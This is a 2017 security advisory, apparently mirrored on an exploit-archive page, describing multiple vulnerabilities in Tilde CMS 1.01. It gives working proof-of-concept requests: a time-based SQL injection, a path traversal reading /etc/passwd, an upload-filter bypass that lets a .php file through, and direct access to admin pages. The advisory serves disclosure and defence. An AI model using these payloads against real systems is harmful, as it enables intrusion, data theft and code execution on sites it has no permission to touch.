扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 |
# Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities # Date: July 7th, 2017 # Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org> # Vendor Homepage: http://www.tildenetwork.com/ # Version: Tilde CMS 1.0.1 # Tested on: Ubuntu 12.04, PHP 5.3.10 I. INTRODUCTION ======================================================================== Tilde CMS is closed-source content management system created by tildenetwork.com II. DESCRIPTION ======================================================================== The web application suffers of multiple vulnerabilities. 1. SQL Injection ------------------------------------------------------------------------ Due to missing escaping of the backtick character, the following query in the source code is vulnerable: [class.SystemAction.php] $SQL_string = "SELECT * FROM <code>form_table_".$id_form."</code> WHERE ID='$idForm'"; $SQL_oldData = @mysql_query($SQL_string,$this->DB_conn); The vulnerability can be trigged via a POST request as shown in the following PoC: POST /actionphp/action.input.php HTTP/1.1 ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1<code> WHERE SLEEP(5)-- aaa &idForm=1234567890 The resulting query on the server-side will be: SELECT * FROM </code>form_table_1<code> WHERE SLEEP(5)-- aaa </code> WHERE ID='1234567890' For a succesful exploitation, the table "form_table_1" must be valid. 2. Path Traversal ------------------------------------------------------------------------ The vulnerabilty exists on this method: GET /actionphp/download.File.php?&file=../../../../../../etc/passwd 3. Arbitrary Files Upload ------------------------------------------------------------------------ It is possible to bypass the implemented restrictions shown in the following snippet of the code: $file=$_FILES['file'.$i]['tmp_name']; if (($file!="")&&($file!="none")) { $source_file=$file; $file_name=$_FILES['file'.$i]['name']; $file_name=str_replace(".php",".txt",$file_name); $file_name=str_replace(" ","_",$file_name); $file_name=str_replace("+","",$file_name); A file named "filename.+php" will be renamed in "filename.php", therefore successfully uploaded. 4. Insecure Direct Object References ------------------------------------------------------------------------ It is possible to retrieve sensitive resources by using direct references. A low privileged user can load the PHP resources such as: admin/content.php admin/content.php?method=ftp_upload IV. BUSINESS IMPACT ======================================================================== These flaws may compromise the integrity of the system and/or expose sensitive information. V. SYSTEMS AFFECTED ======================================================================== Tilde CMS 1.01 is vulnerable (probably all previous versions) VI. VULNERABILITY HISTORY ======================================================================== July 6th, 2017: Vulnerability identification July 7th, 2017: Vendor notification July 13th, 2017: Vendor notification VII. LEGAL NOTICES ======================================================================== The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuseof this information. |
体验盒子
